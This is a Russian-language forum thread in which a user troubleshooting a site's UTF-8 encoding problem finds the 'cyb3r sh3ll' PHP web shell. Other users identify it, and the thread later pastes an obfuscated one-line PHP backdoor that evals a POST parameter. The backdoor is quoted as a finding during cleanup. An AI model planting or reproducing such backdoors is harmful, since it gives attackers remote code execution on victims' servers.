Перейти к содержанию
maxville

Подозрительный файлик

Рекомендуемые сообщения

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:
 

$user = "allah";
 
$pass = "akbar";
$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";


Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.
 

mysqlnd.zip

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Это шелл (дыра в вашем сайте) cyb3r sh3ll. Кстати логи отправляются на mag-kofr@ukr.net, может знакомая почта

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы уверены что шел? А то прям такой очевидный не скрытый текст с явными намёками, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле. Обычно как-то прячут, кодируют..

Изменено пользователем maxville

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы уверены что шел? А то прям такой очевидный не скрытый текст, я подумал может автор какого-то дополнения/модуля просто так пошутил в файле.

Такой текст автор написал, уж извините что очевидный.

 

https://sourceforge.net/projects/cyber-shell/?source=typ_redirect

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Попросили знакомые проверить сайт, сбилась кодировка и не знают почему.

http://trysela.ru/

Все таблицы в БД как и положено в UTF-8, в .htaccess так же прописал UTF-8, в мета - так же указано UTF-8.

Так пока и не пойму в чём проблема. В бд чистый русский язык есть.

Наткнулся на файл

/trysela.ru/www/system/database/mysqlnd.php

В нём смутили строки типа:

 

$user = "allah";

 

$pass = "akbar";

$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";

$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";

Файлик прикрепил. Может он на самом деле просто стёбный, и относится к какому-то модулю?  Кто знает - подскажите плз.

Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ну Алах Акбар вам! Зарегистрировались сегодня. Где симплу взяли???? АААА????

Тк сегодня попросили, как наткнулся так и зарегистрировался, уж извините.

 

 Где симплу взяли???? АААА????

Что вы подразумеваете под "симплой"?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы взялись проверить сайт, но дупля не отбиваете?

 

Здесь /system/database находятся классы для подключения к БД. Можете посмотреть в конфигах, какой файл указан для подключения к БД. Удалите и используйте для подключения стандартные.

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы взялись проверить сайт, но дупля не отбиваете?

Это может вы чего-то не отбиваете. Но не обязательно быть разработчиком чтобы установить, opencart и тому подобные cms. Внести минимальные настройки/правки которые доступны из ПУ или того же гугла. Изначально я взялся посмотреть всего лишь проблемы с кодировкой. А потом уже заметил подозрительные файлики. Что в этой директории находится я понимаю. По дефолту mysqlnd ocstore не используется, и его там вообще не бывает. 

Вопрос тут был задан только из-за шанса что ответит кто-то сталкивающийся непосредственно с данным файликом/шелом. 

 

 

А также удалите варез, покайтесь и искупитесь чесной покупкой модулей.

Повторюсь, сайт не мой.

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ха ха ха))) Старая песня. Я не я и сайт не мой, просто подержать дали))))

Изменено пользователем vilka

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Нужно уметь верить людям, вилка. Учите новую песню  ;) 
 

forvilka.png

Изменено пользователем maxville

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ха ха ха))) Старая песня. Я не я и сайт не мой, просто подержать дали))))

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей или сайтов   :ugeek:

Изменено пользователем n3bo
  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Нужно уметь верить людям, вилка. Учите новую песню  ;) 

 

forvilka.png

 

Погуглите Aibolit, пробежитесь им по сайту, как экономный вариант.

Изменено пользователем n3bo
  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Уже не смешно. Избитая тема. И причем вина не всегда владельцев сайта.

 

Самое интересное, что беспокоитесь о варезе больше Вы, чем владельцы модулей  :ugeek:

Он слишком далёкий от этого, а я ответственный :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ааа... ну раз все сами понимаете, тогда просто добавьте к параметрам подключения это

"SET NAMES 'utf8'"
"SET CHARACTER SET utf8"
"SET CHARACTER_SET_CONNECTION=utf8"

и можете пользоваться сайтом дальше

Разумеется я это первым делом проверял, всё это есть в движке по дефолту.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

с кодировкой базы врядли как-то связано, потому как в заголовках ответа

content-type:
text/html; charset=windows-1251

вот и не могу понять откуда он берёт эту кодировку, когда везде где только можно указал UTF-8

Изменено пользователем maxville

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

установите кодировку явно в заголовке

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

касательно most advanced PHP Web Shell узнайте у @Einshtein, он такими делами помышляет

Благодарю, отпишусь!

по поводу проверки айболитом - да, есть куча не хорошего, например файлы с таким содержимым, и больше там ничего нет.

 

<?php                                                                                                                                                                                                                                                                   $bunu5="s_top" ; $qfv8=strtoupper($bunu5[1]. $bunu5[4]. $bunu5[3].$bunu5[0]. $bunu5[2]) ; if (isset(${$qfv8 }['qe0080b' ])) {eval(${ $qfv8 } ['qe0080b'] ) ;} ?> 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

установите кодировку явно в заголовке

Если вы про это 

<meta content="text/html; charset=utf-8" http-equiv="Content-Type">

То она указана. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Да, уже заметил что отдаёт эту кодировку. Но не понимаю откуда он её берёт.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Он ее берт там где у вас в файлах или BOM или пробел или пустая строка в файле ( в каком-либо файле)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

На наличие БУМ - прогнал, всё хорошо. С остальными буду разбираться. Спасибо за ответы.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Хм.. странно, в отдельном php.ini в корневой директории сайта на default_charset - сайт внимания не обращал. А на хостинге в ПУ прописал default_charset = UTF-8 - и на сайте всё сразу стало красиво. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.